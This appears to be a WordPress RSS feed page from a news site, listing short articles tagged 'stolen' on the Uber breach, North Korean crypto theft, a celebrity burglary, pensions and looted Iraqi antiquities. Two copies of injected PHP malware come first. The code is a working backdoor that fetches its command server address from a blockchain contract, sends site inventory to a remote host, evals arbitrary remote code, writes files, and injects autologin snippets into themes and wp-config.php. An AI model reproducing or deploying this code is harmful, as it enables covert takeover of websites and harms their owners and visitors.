// q2_xh if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php', 'ctrl'=>'// q2_xh', 'vis'=>'// xp_v9', 'vis_func'=>'wp_dia8xd', 'vis_paths'=>array('/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php'), 'opt'=>'_wp_47nl0jvi', ); $keys=array(); $keys['id']='kun'; $keys['ver']='em'; $keys['caps']='eby'; $keys['tasks']='awd'; $keys['interval']='pww'; $keys['ack_id']='nl0'; $keys['ok']='9s'; $keys['detail']='wyy'; $keys['inv']='kxw'; $keys['result']='f3t'; $hdr='X-J98-Auth';$tok='0cQMbCeRLTCSW0NdninnOEVrAtwy11ErS16wrKLqeas';$id='1d0c923bac57072b';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); // l0_9z if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php', 'ctrl'=>'// l0_9z', 'vis'=>'// zn_yn', 'vis_func'=>'wp_cuzg8t', 'vis_paths'=>array('/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php'), 'opt'=>'_wp_mtrhds4x', ); $keys=array(); $keys['id']='ybc'; $keys['ver']='a1'; $keys['caps']='afo'; $keys['tasks']='x9t'; $keys['interval']='2e4'; $keys['ack_id']='k72'; $keys['ok']='ch'; $keys['detail']='xd9'; $keys['inv']='hw8'; $keys['result']='0bb'; $hdr='X-L8A-Auth';$tok='A3-EVnA_qOJ132k0gQIT_73RgM-QQ5Szxw145ZNDetU';$id='d1451f9eb0097c9f';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); stolen – Brief News https://briefnews.eu Latest World News. Find every day short and brief information composed of titles and subtitles and continue reading if interested. Sat, 17 Sep 2022 01:56:46 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.7 https://briefnews.eu/wp-content/uploads/2018/01/cropped-logoSmall-1-32x32.png stolen – Brief News https://briefnews.eu 32 32 Uber finds ‘no evidence’ that sensitive user data was stolen in hack https://briefnews.eu/uber-finds-no-evidence-that-sensitive-user-data-was-stolen-in-hack/ https://briefnews.eu/uber-finds-no-evidence-that-sensitive-user-data-was-stolen-in-hack/#respond Sat, 17 Sep 2022 01:56:46 +0000 https://briefnews.eu/uber-finds-no-evidence-that-sensitive-user-data-was-stolen-in-hack/ The intruder who claims to have hacked Uber might not have done much damage. The ridesharing firm has determined that there's "no evidence" the perpetrator accessed sensitive user data, such as trip histories. All services are functioning properly, and the company has restored the use of internal software it took down upon discovering the breach.

Uber didn't say more about the reported culprit or the nature of the incident. Bleeping Computer says it has seen screenshots from the hacker that purport to show Uber's IT resources, including its Amazon Web Services console, Google Workspace dashboard and virtual machines. The perpetrator also gained access to Uber's bug bounty program, suggesting they might be aware of security holes the company hasn't necessarily fixed.

Account info appears to be safe. However, there are concerns the attacker might have access to source code, or could sell the bounty data to other hackers who might use vulnerabilities for their own campaigns. There may be fallout in the days ahead, even if Uber passengers don't have any immediate reasons to worry.

]]>
https://briefnews.eu/uber-finds-no-evidence-that-sensitive-user-data-was-stolen-in-hack/feed/ 0
Feds claw back $30 million of cryptocurrency stolen by North Korean hackers https://briefnews.eu/feds-claw-back-30-million-of-cryptocurrency-stolen-by-north-korean-hackers/ https://briefnews.eu/feds-claw-back-30-million-of-cryptocurrency-stolen-by-north-korean-hackers/#respond Fri, 09 Sep 2022 02:27:22 +0000 https://briefnews.eu/feds-claw-back-30-million-of-cryptocurrency-stolen-by-north-korean-hackers/
Feds claw back $  30 million of cryptocurrency stolen by North Korean hackers

Enlarge (credit: Getty Images)

Cryptocurrency analytics firm Chainalysis said on Thursday that it helped the US government seize $ 30 million worth of digital coins that North Korean-backed hackers stole earlier this year from the developer of the non-fungible token-based game Axie Infinite.

When accounting for the more than 50 percent fall in cryptocurrency prices since the theft occurred in March, the seizure represents only about 12 percent of the total funds stolen. The people who pulled off the heist transferred 173,600 ethereum worth about $ 594 million at the time and $ 25.5 million in USDC stablecoin, making it one of the biggest cryptocurrency thefts ever.

Harder to hide

The seizures “demonstrate that it is becoming more difficult for bad actors to successfully cash out their ill-gotten crypto gains,” Erin Plante, senior director of investigations at Chainalysis, wrote. “We have proven that with the right blockchain analysis tools, world-class investigators and compliance professionals can collaborate to stop even the most sophisticated hackers and launderers.”

Read 6 remaining paragraphs | Comments

]]>
https://briefnews.eu/feds-claw-back-30-million-of-cryptocurrency-stolen-by-north-korean-hackers/feed/ 0
Paul Gascoigne chokes up over late dad’s stolen watch in heartbreaking plea after break-in https://briefnews.eu/paul-gascoigne-chokes-up-over-late-dads-stolen-watch-in-heartbreaking-plea-after-break-in/ https://briefnews.eu/paul-gascoigne-chokes-up-over-late-dads-stolen-watch-in-heartbreaking-plea-after-break-in/#respond Mon, 07 Sep 2020 09:52:40 +0000 https://briefnews.eu/paul-gascoigne-chokes-up-over-late-dads-stolen-watch-in-heartbreaking-plea-after-break-in/

“Let’s hope Paul’s luck changes and he gets his property back – All the best Gazza,” someone else added.

While a fourth said: “Poor Gazza bless him. Give him his watch back.”

The police suspect Paul’s home may have been targeted after Piers uploaded a photo of the ex-footballer during the filming of Life Stories, signalling Paul wasn’t at home. 

The burglars took five watches, two bracelets, three rings, diamond earrings and a genuine New York Police Department badge, the ex-footballer revealed. 

Among the stolen items were a watch and cigar cutter that belonged to Paul’s late father. 

Good Morning Britain airs weekdays on ITV at 6am.

Let’s block ads! (Why?)

]]>
https://briefnews.eu/paul-gascoigne-chokes-up-over-late-dads-stolen-watch-in-heartbreaking-plea-after-break-in/feed/ 0
‘Women have paid in and pensions have been STOLEN’ Chris Kamara outrage at WASPI scandal https://briefnews.eu/women-have-paid-in-and-pensions-have-been-stolen-chris-kamara-outrage-at-waspi-scandal/ https://briefnews.eu/women-have-paid-in-and-pensions-have-been-stolen-chris-kamara-outrage-at-waspi-scandal/#respond Fri, 06 Dec 2019 12:11:35 +0000 http://briefnews.eu/women-have-paid-in-and-pensions-have-been-stolen-chris-kamara-outrage-at-waspi-scandal/

Football commentator Chris Karma joined Jeremy Vine in the studio this morning to discuss his Christmas album, but it was his outrage for the WASPI scandal that got the biggest reaction as he claimed women have had their pensions “taken away from them”. Viewers called Kamara a great advocate for women after he expressed his views. 

Today’s show focused on women who have lost years of state pension after their retirement age and Jeremy Corbyn’s pledge to help. However it is going to cost the taxpayer £58billion. 

Jeremy took a call from a woman named Angela from Manchester and asked: “So how much have you lost Angela.”

Angela replied: “It is going to average around £38,000-a-year by the age of 66, which is a huge amount of money.”

Jeremy asked: “Are you in your 60’s now?” and Angela quickly revealed she is 63 years-old.

READ MORE: ‘Move from Boris or we talk about Blair’ Vine clashes with Campbell

Jeremy addressed Angela: “There we go Angela we have the backing of Chris.”

Angela interrupted: “Well that’s the backbone of this entire argument is that I didn’t know.”

Earlier in the show Jeremy spoke to Louise Cooper, who told the host: “The vast majority of women affected are wealthy. You must remember that women live longer than men and yet we’ve retired five years earlier. That is not fair!”

She continued: “If you look at the money that men put into the system relative to the money women put into the system, it’s grossly unfair on men.

Let’s block ads! (Why?)

]]>
https://briefnews.eu/women-have-paid-in-and-pensions-have-been-stolen-chris-kamara-outrage-at-waspi-scandal/feed/ 0
Almost $500,000 in Ethereum Classic coin stolen by forking its blockchain https://briefnews.eu/almost-500000-in-ethereum-classic-coin-stolen-by-forking-its-blockchain/ https://briefnews.eu/almost-500000-in-ethereum-classic-coin-stolen-by-forking-its-blockchain/#respond Tue, 08 Jan 2019 09:52:14 +0000 http://briefnews.eu/almost-500000-in-ethereum-classic-coin-stolen-by-forking-its-blockchain/
Almost $  500,000 in Ethereum Classic coin stolen by forking its blockchain

Enlarge (credit: ethereumclassic.org)

Attackers have stolen almost $ 500,000 worth of the Ethereum Classic digital currency by carrying out a compute-intensive hack that rewrote its blockchain, officials with Coinbase, one of the leading crypto currency exchanges, said on Monday.

The heist was the result of carrying out what’s known as a rollback attack, which allowed the attackers to reorganize the Ethereum blockchain, Coinbase security engineer Mark Nesbitt said in a blog post. From there, the attackers were able to “double spend” about 88,500 ETC, meaning they were able to recover previously spent coins and transfer them to a new entity. As a result, the coins were effectively transferred from the rightful recipients to new entities chosen by the attackers.

“We observed repeated deep reorganizations of the Ethereum Classic blockchain, most of which contained double spends,” Nesbitt wrote. “The total value of the double spends that we have observed thus far is 88,500 ETC (~$ 460,000).”

Read 4 remaining paragraphs | Comments

]]>
https://briefnews.eu/almost-500000-in-ethereum-classic-coin-stolen-by-forking-its-blockchain/feed/ 0
Smuggling Backlash Leads to Iraq's Stolen Treasures Returning Home https://briefnews.eu/smuggling-backlash-leads-to-iraqs-stolen-treasures-returning-home/ https://briefnews.eu/smuggling-backlash-leads-to-iraqs-stolen-treasures-returning-home/#respond Sun, 16 Dec 2018 15:15:28 +0000 http://briefnews.eu/smuggling-backlash-leads-to-iraqs-stolen-treasures-returning-home/ The 5,500 artifacts from modern-day Iraq were intentionally mislabeled as clay tiles and smuggled through the United Arab Emirates and Israel, traveling thousands of miles to the United States. There, they landed with their waiting recipients — the arts and crafts chain Hobby Lobby, and its owners, the Green family, who hoped to spotlight the ancient valuables in their pet project, the Museum of the Bible.

Rampant looting from war-torn Iraq was nothing new, but the international condemnation of Hobby Lobby’s move was. In July 2017, Hobby Lobby agreed to a fine of $ 3 million for smuggling, and in August last year, Israeli authorities seized five antiquities dealers in Jerusalem, thanks to a tip from American investigators looking into the case. In May 2018, U.S. Immigration and Customs Enforcement finally returned 3,800 of the precious goods, passing on cuneiform tablets, cylinder seals and clay bullae to the Iraqi Embassy in Washington, D.C., which relayed the artifacts back to the Iraq Museum in Baghdad.

In the past, such multilateral cooperation may have been impossible. But all that has changed now thanks to an increasing global backlash against stolen antiquities that has pushed internationally renowned museums to refuse loaned collections of questionable artifacts, and investigators who are working together more than ever to crush illegal dealers. New York’s Metropolitan Museum of Art and The British Museum have both turned down loaned collections, owing to their suspicion of questionable transactions, and the renowned owner of the Parthenon Marbles (aka Elgin Marbles) has even planned an exhibit this autumn highlighting how ISIS destroyed and profited from Iraqi heritage. The British Metropolitan Police, meanwhile, has bolstered its antiquities unit, and the FBI boasts a 16-person art crime unit.

In Cambridge, England, a lone wolf named Christos Tsirogiannis has taken it upon himself to scour daily a 30,000-picture database of illegal antiquities, comparing them to the top auction houses of the world to catch illicit ones before they go on sale. And in New York City, one of the largest markets for stolen antiquities in the world, Matthew Bogdanos, a Marine and hard-charging Manhattan assistant district attorney, has become famous for hunting down stolen treasures everywhere from the homes of the wealthy to museums and auction houses that profit off the illicit goods.

If anything is excavated illegally from anywhere in the area, the first people who will stop it are the locals themselves.

